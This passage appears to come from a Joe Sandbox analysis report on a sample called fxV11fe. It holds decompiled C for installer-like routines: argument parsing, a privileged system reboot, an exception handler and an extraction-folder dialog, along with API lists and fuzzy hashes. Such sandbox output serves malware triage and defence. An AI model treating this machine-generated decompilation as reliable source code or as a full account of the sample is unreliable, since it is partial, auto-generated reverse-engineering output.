                                                                                                                                                                                                                                            																							 *0xa09a2c =  *0xa09a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0xa09a2c =  *0xa09a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0xa08d48 =  *0xa08d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0xa09a2c =  *0xa09a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0xa08a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0xa09a2c = 3;
                                                                                                                                                                                                                                            																	 *0xa08a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0xa08a2c != 0 &&  *0xa08b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa09a3c, 0xa08b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E00A066C8(0xa08b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x00a05d19
                                                                                                                                                                                                                                            0x00a05d19
                                                                                                                                                                                                                                            0x00a05d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d3f
                                                                                                                                                                                                                                            0x00a05d3f
                                                                                                                                                                                                                                            0x00a05d4b
                                                                                                                                                                                                                                            0x00a05d4b
                                                                                                                                                                                                                                            0x00a05d4f
                                                                                                                                                                                                                                            0x00a05d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d93
                                                                                                                                                                                                                                            0x00a05d93
                                                                                                                                                                                                                                            0x00a05d9a
                                                                                                                                                                                                                                            0x00a05d9d
                                                                                                                                                                                                                                            0x00a05d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d9e
                                                                                                                                                                                                                                            0x00a05d51
                                                                                                                                                                                                                                            0x00a05d5b
                                                                                                                                                                                                                                            0x00a05d72
                                                                                                                                                                                                                                            0x00a060fb
                                                                                                                                                                                                                                            0x00a060fb
                                                                                                                                                                                                                                            0x00a06207
                                                                                                                                                                                                                                            0x00a0620a
                                                                                                                                                                                                                                            0x00a0620b
                                                                                                                                                                                                                                            0x00a0620e
                                                                                                                                                                                                                                            0x00a06217
                                                                                                                                                                                                                                            0x00a05d78
                                                                                                                                                                                                                                            0x00a05d78
                                                                                                                                                                                                                                            0x00a05d80
                                                                                                                                                                                                                                            0x00a05d83
                                                                                                                                                                                                                                            0x00a05d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d84
                                                                                                                                                                                                                                            0x00a05d5d
                                                                                                                                                                                                                                            0x00a05d5f
                                                                                                                                                                                                                                            0x00a05d62
                                                                                                                                                                                                                                            0x00a05d68
                                                                                                                                                                                                                                            0x00a05d64
                                                                                                                                                                                                                                            0x00a05d64
                                                                                                                                                                                                                                            0x00a05d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d62
                                                                                                                                                                                                                                            0x00a05d5b
                                                                                                                                                                                                                                            0x00a05d4f
                                                                                                                                                                                                                                            0x00a05d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d9f
                                                                                                                                                                                                                                            0x00a05d9f
                                                                                                                                                                                                                                            0x00a05da5
                                                                                                                                                                                                                                            0x00a05dab
                                                                                                                                                                                                                                            0x00a05dba
                                                                                                                                                                                                                                            0x00a06218
                                                                                                                                                                                                                                            0x00a0621d
                                                                                                                                                                                                                                            0x00a06220
                                                                                                                                                                                                                                            0x00a06221
                                                                                                                                                                                                                                            0x00a06229
                                                                                                                                                                                                                                            0x00a06230
                                                                                                                                                                                                                                            0x00a06247
                                                                                                                                                                                                                                            0x00a0626a
                                                                                                                                                                                                                                            0x00a06272
                                                                                                                                                                                                                                            0x00a06249
                                                                                                                                                                                                                                            0x00a06255
                                                                                                                                                                                                                                            0x00a0625f
                                                                                                                                                                                                                                            0x00a06264
                                                                                                                                                                                                                                            0x00a06264
                                                                                                                                                                                                                                            0x00a06284
                                                                                                                                                                                                                                            0x00a05dc0
                                                                                                                                                                                                                                            0x00a05dc0
                                                                                                                                                                                                                                            0x00a05dca
                                                                                                                                                                                                                                            0x00a05e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05dcc
                                                                                                                                                                                                                                            0x00a05dce
                                                                                                                                                                                                                                            0x00a05e24
                                                                                                                                                                                                                                            0x00a05e24
                                                                                                                                                                                                                                            0x00a05e2c
                                                                                                                                                                                                                                            0x00a05e47
                                                                                                                                                                                                                                            0x00a05e4a
                                                                                                                                                                                                                                            0x00a061d2
                                                                                                                                                                                                                                            0x00a061e2
                                                                                                                                                                                                                                            0x00a061e7
                                                                                                                                                                                                                                            0x00a061ee
                                                                                                                                                                                                                                            0x00a061f1
                                                                                                                                                                                                                                            0x00a061f1
                                                                                                                                                                                                                                            0x00a061f8
                                                                                                                                                                                                                                            0x00a061f8
                                                                                                                                                                                                                                            0x00a05e50
                                                                                                                                                                                                                                            0x00a05e53
                                                                                                                                                                                                                                            0x00a06109
                                                                                                                                                                                                                                            0x00a0611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06125
                                                                                                                                                                                                                                            0x00a06137
                                                                                                                                                                                                                                            0x00a0613a
                                                                                                                                                                                                                                            0x00a0613c
                                                                                                                                                                                                                                            0x00a0613e
                                                                                                                                                                                                                                            0x00a0613e
                                                                                                                                                                                                                                            0x00a06141
                                                                                                                                                                                                                                            0x00a06141
                                                                                                                                                                                                                                            0x00a06143
                                                                                                                                                                                                                                            0x00a06144
                                                                                                                                                                                                                                            0x00a0614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06150
                                                                                                                                                                                                                                            0x00a06152
                                                                                                                                                                                                                                            0x00a0615c
                                                                                                                                                                                                                                            0x00a06170
                                                                                                                                                                                                                                            0x00a05f7f
                                                                                                                                                                                                                                            0x00a05ec3
                                                                                                                                                                                                                                            0x00a05ec3
                                                                                                                                                                                                                                            0x00a05ecc
                                                                                                                                                                                                                                            0x00a05ed4
                                                                                                                                                                                                                                            0x00a05ed6
                                                                                                                                                                                                                                            0x00a05edc
                                                                                                                                                                                                                                            0x00a05edf
                                                                                                                                                                                                                                            0x00a05eea
                                                                                                                                                                                                                                            0x00a05eed
                                                                                                                                                                                                                                            0x00a05f3f
                                                                                                                                                                                                                                            0x00a05f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05eef
                                                                                                                                                                                                                                            0x00a05eef
                                                                                                                                                                                                                                            0x00a05ef2
                                                                                                                                                                                                                                            0x00a05f34
                                                                                                                                                                                                                                            0x00a05ef4
                                                                                                                                                                                                                                            0x00a05ef4
                                                                                                                                                                                                                                            0x00a05ef7
                                                                                                                                                                                                                                            0x00a05f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05ef9
                                                                                                                                                                                                                                            0x00a05ef9
                                                                                                                                                                                                                                            0x00a05efc
                                                                                                                                                                                                                                            0x00a05f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05efe
                                                                                                                                                                                                                                            0x00a05eff
                                                                                                                                                                                                                                            0x00a05f02
                                                                                                                                                                                                                                            0x00a05f16
                                                                                                                                                                                                                                            0x00a05f04
                                                                                                                                                                                                                                            0x00a05f07
                                                                                                                                                                                                                                            0x00a05f0d
                                                                                                                                                                                                                                            0x00a05f46
                                                                                                                                                                                                                                            0x00a05f46
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f07
                                                                                                                                                                                                                                            0x00a05f02
                                                                                                                                                                                                                                            0x00a05efc
                                                                                                                                                                                                                                            0x00a05ef7
                                                                                                                                                                                                                                            0x00a05ef2
                                                                                                                                                                                                                                            0x00a05f4c
                                                                                                                                                                                                                                            0x00a05f4e
                                                                                                                                                                                                                                            0x00a05f50
                                                                                                                                                                                                                                            0x00a05f54
                                                                                                                                                                                                                                            0x00a05ed4
                                                                                                                                                                                                                                            0x00a05ea2
                                                                                                                                                                                                                                            0x00a05ea4
                                                                                                                                                                                                                                            0x00a05eaf
                                                                                                                                                                                                                                            0x00a05eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e79
                                                                                                                                                                                                                                            0x00a05e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e85
                                                                                                                                                                                                                                            0x00a05e85
                                                                                                                                                                                                                                            0x00a05e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e94
                                                                                                                                                                                                                                            0x00a05e8e
                                                                                                                                                                                                                                            0x00a05e7d
                                                                                                                                                                                                                                            0x00a05e77
                                                                                                                                                                                                                                            0x00a05e6e
                                                                                                                                                                                                                                            0x00a05e65
                                                                                                                                                                                                                                            0x00a05e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dce
                                                                                                                                                                                                                                            0x00a05dca
                                                                                                                                                                                                                                            0x00a05dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d00
                                                                                                                                                                                                                                            0x00a05dd9
                                                                                                                                                                                                                                            0x00a05e04
                                                                                                                                                                                                                                            0x00a061fe
                                                                                                                                                                                                                                            0x00a05e0a
                                                                                                                                                                                                                                            0x00a05e0c
                                                                                                                                                                                                                                            0x00a05e17
                                                                                                                                                                                                                                            0x00a05e17
                                                                                                                                                                                                                                            0x00a05e04
                                                                                                                                                                                                                                            0x00a06200
                                                                                                                                                                                                                                            0x00a06200
                                                                                                                                                                                                                                            0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00A05CEE
• GetModuleFileNameA.KERNEL32(00A08B3E,00000104,00000000,?,?), ref: 00A05DFC
• CharUpperA.USER32(?), ref: 00A05E3E
• CharUpperA.USER32(-00000052), ref: 00A05EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A05F6F
• CharUpperA.USER32(?), ref: 00A05FA7
• CharUpperA.USER32(-0000004E), ref: 00A06008
• CharUpperA.USER32(?), ref: 00A060AA
• CloseHandle.KERNEL32(00000000,00A01140,00000000,00000040,00000000), ref: 00A061F1
• ExitProcess.KERNEL32 ref: 00A061F8
Strings
Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: 787dcfd21c62dd52099e8bdef50b822d3227f23c7d7d7d92554d26f9a8774ffe
• Instruction ID: 894d8dc36ade8a0caf689afa7ca51ee9049d132896e8a4e8b1078e3061bb3af1
• Opcode Fuzzy Hash: 787dcfd21c62dd52099e8bdef50b822d3227f23c7d7d7d92554d26f9a8774ffe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAD13871E04A4D5AEF39CB78BC483FB3B61AB1A344F1441AAD4CAD61D1DA748E838F04
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A01F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa09a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A044B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A06CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A044B9(0, 0x522, 0xa01140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A01EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a01f16
                                                                                                                                                                                                                                            0x00a01f17
                                                                                                                                                                                                                                            0x00a01f1a
                                                                                                                                                                                                                                            0x00a01f1f
                                                                                                                                                                                                                                            0x00a01f1f
                                                                                                                                                                                                                                            0x00a01f86
                                                                                                                                                                                                                                            0x00a01f8f
                                                                                                                                                                                                                                            0x00a01fcf
                                                                                                                                                                                                                                            0x00a01fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fd3
                                                                                                                                                                                                                                            0x00a01fa9
                                                                                                                                                                                                                                            0x00a01fb4
                                                                                                                                                                                                                                            0x00a01fbb
                                                                                                                                                                                                                                            0x00a01fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fc3
                                                                                                                                                                                                                                            0x00a01f9a
                                                                                                                                                                                                                                            0x00a01f9a
                                                                                                                                                                                                                                            0x00a01fa2
                                                                                                                                                                                                                                            0x00a01fd9
                                                                                                                                                                                                                                            0x00a01fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A01EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A01F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00A01FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: b33e180ebf39bcfbc20ac2729c6ef21f5608b96a7878343feb7f24cfb6682df3
                                                                                                                                                                                                                                            • Instruction ID: 9a524a7387f91190bb4c869e25664e2bffa62b442ff2546d5218fde089e9215e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33e180ebf39bcfbc20ac2729c6ef21f5608b96a7878343feb7f24cfb6682df3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621A3B1B4020E6BDB209BE1AC4AFFF76B8EB95B10F10051AFB02E61C1D77588039661
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A06CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a06cf7
                                                                                                                                                                                                                                            0x00a06d00
                                                                                                                                                                                                                                            0x00a06d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A06E26,00A01000), ref: 00A06CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A06E26,?,00A06E26,00A01000), ref: 00A06D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A06E26,00A01000), ref: 00A06D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A06E26,00A01000), ref: 00A06D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 2e1d8545e5bf5b0e751a2b9225e635919d5179a5e28eaa525618449f942e0236
                                                                                                                                                                                                                                            • Instruction ID: 5832c165fa3d834a0801eb6965fe6b7c5919aeddddd1112bdcfea06636e26335
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e1d8545e5bf5b0e751a2b9225e635919d5179a5e28eaa525618449f942e0236
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD0C93200030CBBDB006BE1EC0CA593F28EB58312F444100F31982020CA3244538B52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A03210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00A043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xa09a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00A044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xa091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xa091e5 - 3;
						if(_t49 - 0xa091e5 < 3) {
							goto L32;
						}
						_t24 =  *0xa091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xa091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00A0658A(0xa091e4, 0x104, 0xa01140);
								_t27 = E00A058C8(0xa091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xa091e4 - 0x5c;
									if( *0xa091e4 != 0x5c) {
										L30:
										_t30 = E00A0597D(0xa091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xa091e5 - 0x5c;
									if( *0xa091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00A044B9(_t64, 0x54a, 0xa091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xa091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xa091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xa091e4 - 0x5c;
